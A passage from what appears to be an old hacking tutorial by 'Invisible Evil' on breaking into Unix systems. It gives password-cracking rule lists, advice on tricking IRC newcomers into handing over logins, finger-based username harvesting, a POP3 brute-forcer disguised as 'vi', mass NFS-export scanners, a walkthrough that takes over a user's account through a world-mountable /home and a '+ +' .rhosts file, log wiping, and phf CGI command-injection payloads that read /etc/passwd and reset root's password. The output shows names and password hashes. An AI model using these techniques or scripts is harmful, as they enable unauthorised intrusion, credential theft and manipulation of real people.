jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
--------------- end of jackhash.bat
You can get password files without an account, see next chapter.
------------------
Section 2B.
Talking to newbe's
------------------
There are other ways to get an account without doing much work. Park yourself
on an irc channel that you made with a title about hacking. Also try joining
other channels already on the irc. Channels would include:
#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout or any others you can find.
Now what you are looking for are newbe's looking to learn or exploit their shell
they are on already. There is always someone out there that does not know as
much as you. Watch for someone out there that asks a newbe question and gets
no answer or even kicked off the channel. Here is your mark ;)
/msg him so that others can't see that you are talking to him, and begin to ask
him questions, try to help him, but not too much ;) Finally tell him that you
can login for him and do it. This could be to snatch the passwd file or god
knows what. Promise him the world and get that login password. Now you have
a start and can start your on-hands learning process. If you get root on the
system you might not want to expose that to him, but you can feed him other
goodies that will keep him busy while you sniff some other passwords on the
system.
So now if there are some out there that remember i-e when you gave him your
login and password, you can be sure that the above never happened <G>rin ...
I tend to like to help people learn so I am telling the truth when i say I
have dealt honestly with most everyone I have come across.
-------------
Section 2C.
The hard way
-------------
There is another way you can do this. Be sure that on most big systems
that users do not use secure passwords. from a shell do this:
finger @domainname.com Watch I will do a real domain:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
Now we might want to try logging in later, log this information:
Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...
This one looks good, wendt:Catherine:catherine
Here is another command:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
You get more info to play with ;)
I know this can make you tired ....
Remember this stuff will log your tries, so if you get on and get root, clean
the logs ;)
Here is a small .c file you can use if you get on.
pop3hack.c
----- cut here
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
You could also write a small perl script that will finger @ from a domain
list and cat the response to a file, then when done it will go back and try
to login using pop3d username-username (or other info) and putting the
response into another file for you.
You can ftp to rs.internic.net:
in the domain directory you will find:
com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
download these files and run getdomain.pl (script below) on the domains you
want to target first, in this manor:
"perl getdomain.pl com.zone com >com.all"
What this will do is rip all of the .COM domains and put them into a file
called comm.all.
If you wanted to do all of the .EDU addresses you would type:
perl getdomain.pl edu.zone edu >edu.all
Now you will have a list to use with your probe called edu.all
Here is the perl script
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
my(@lines) = <INFILE>;
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash{$key}++;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "$_\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
To use the script above all you need to do is copy between the lines above
and name it getdomain.pl, now copy it into the unix os and type
chmod +x getdomain.pl
Now it is ready to run with the command lines above.
------------------------------------------
Section 2D.
using Mount to gain access to unix systems
------------------------------------------
This is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines drives
you yours. This is done so you can do installs from other machines, or just
share drives or directories across the network. The problem is that many
admins are good with unix commands or setup. Or maybe they are just plain
lazy and mount the drives with world access not understanding that the world
can mount the drive and gain write access to their users directories.
What you will need to get started here is a hacked root account. To be able to
mount the remote drive and gain access you will need to modify the system's
password file and use the su command.
Ok let's say we have root access. let's get started!
You can see if another system has mountable drives by using the showmount
command.
From root account:
$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
Ok, no problem, this domain will not work, go on to the next one...
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
Notice the (everyone), this would be good if we wanted to install linux
from this guy's box, but we want open directories to users.... so go on to
the next one...
$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)
Now this guy mounted his home directory, the user accounts are off of the home
directory ;) and look above ... (everyone) can access it!
Ok, this section was to show you how to see if they are mountable, in the next
section i will show you how to mount and hack it. But for now, here is a
script that will scan for EVERY DOMAIN on the internet that is mountable and
log them for you.
To use this script simply use the domain ripper in the PHF section and download
the needed files from rs.internic.net rip some domains and name the file
'domains' and startup the script. To make it run in the background put a
& after the command. like this: cmount.pl&
How it works:
When you run the file it will go to the domains list and run showmount -e
on each domain, if it finds that there is a return on mountable drives
it will save the info in the current directory in files named:
domain.XXX.export. All you have to do is view the files and mount the drives!
--------------- start of cmount.pl
#!/usr/bin/perl -w
#
# Check NFS exports of hosts listed in file.
# (Hosts are listed, once per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net - 2/27/97.
# Assign null list to @URLs which will be added to later.
my(@result) = ();
my(@domains) = ();
my($program) = "showmount -e ";
# Pull off filename from commandline. If it isn't defined, then assign default.
my($DomainFilename) = shift;
$DomainFilename = "domains" if !defined($DomainFilename);
# Do checking on input.
die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename);
# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename) or
die("mountDomains: Cannot open $DomainFilename for input.\n");
while (<DOMAINFILE>) {
chomp($_);
print "Now checking: $_";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program $_ |");
@execResult = <EXECFILE>;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">$_.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
Ok, now on to mounting the drives ....
lets say we did a showmount -e domain.com and got back:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
We would want to mount / .. yup .... this guy has his entire system mountable!
$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount
Make sure you make the mount directory first, you can make this anywhere on the
system that you want. If the systems /mnt directory is empty you can use it
also.
Ok this is for real:
bash# ls -al /mnt ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; lets make one for them <g>rin
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost+found radius-961029.ps
bash# ; there is is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> ; yup we are in!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
>
So now we have access, so lets just hack this system ... oops, that is another
lesson! Have pun!
---------------------
Chapter III
Getting passwd files
---------------------
Here are some ways to get password files from unix systems. Most of them
you will need an account, but there is still a way to access to the system
without having an account. Here you will learn the difference between a
regular passwd file and a shadowed passwd file. You will also learn a way
to read the shadowed password file.
------------------
Section 3A
PHF WWW PH Query
------------------
There is a program in the WWW cgi-bin directory called phf, if the file
is there, and has permission x, you can access it by using the www, or
a text version browser in linux called lynx. Now you can read files on the
system (yup .. /etc/passwd) and save them to files local in your computer.
There are many things we can get done here. If the server is running their
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.
I will include a perl script here that will auto check all of the systems out
there by using the getdomain.pl script above and check what the server is
running under. If it is running under root, it will just log the id, if the
server is not running under root, it will auto get the passwd file from the
/etc directory and name it domainname.???.passwd.
I will also attach a script that will allow you to use a simple command from
a shell and if phf is on the system allow you to pipe commands from the shell
to the remote system with one command line.
Ok now that you know what is coming, lets teach you how to use phf.
Use your favorite web browser, or the text version in unix called most of
the time lynx, on some systems www.
After the screen comes up type the letter g, now a line appears like below:
URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
You type:
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
It returns:
QUERY RESULTS
/usr/local/bin/ph -m alias=x id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
So here we see it is running under a user (nobody), so we can be a user named
nobody on this system. We are not root, but this will have to do ;)
Notice the command line:
http://afp.org/cgi-bin/phf/?Qalias=x%0aid
The id was the command to the server to give us the id of the user. Some times
you will have to give the full path to the file you want to run, in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id
Notice that after the %0a you start your command line. If you need to enter
a space you would put a %20 instead of the space. Here would be some sample
command lines. I will start them with %0a
Cat the passwd file
%0a/bin/cat%20/etc/passwd
Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*
backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my
Change the root passwd (if the server will let you (most times it works)
%0apasswd%20root
(the above should let you login without a password, make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)
If you know how to type commands in unix and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!
Ok lets cat the passwd file on this box ;)
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd
We get:
QUERY RESULTS
/usr/local/bin/ph -m alias=x cat /etc/passwd
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
A small passwd file <g>rin
If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.
Lets learn something here:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7
1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell
Ok, lets say you do not want to keep using the WWW browser, here is a script
you can compile to just type regular commands from your shell.
phf.c
------ cut here----
/* Some small changes for efficiency by snocrash. */
/*
* cgi-bin phf exploit by loxsmith [xf]
*
* I wrote this in C because not every system is going to have lynx. Also,
* this saves the time it usually takes to remember the syntatical format
* of the exploit. Because of the host lookup mess, this will take
* approximately 12 seconds to execute with average network load. Be patient.
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
int main(argc, argv)
int argc;
char **argv;
{
int i = 0, s, port, bytes = 128;
char exploit[0xff], buffer[128], hostname[256], *command, j[2];
struct sockaddr_in sin;
struct hostent *he;
if (argc != 3 && argc != 4) {
fprintf(stderr, "Usage: %s command hostname [port]", argv[0]);
exit(1);
}
command = (char *)malloc(strlen(argv[1]) * 2);
while (argv[1][i] != '\0') {
if (argv[1][i] == 32) strcat(command, "%20"); else {
sprintf(j, "%c", argv[1][i]);
strcat(command, j);
}
++i;
}
strcpy(hostname, argv[2]);
if (argc == 4) port = atoi(argv[3]); else port = 80;
if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) {
he = gethostbyname(hostname);
if (he) {
sin.sin_family = he->h_addrtype;
memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0],
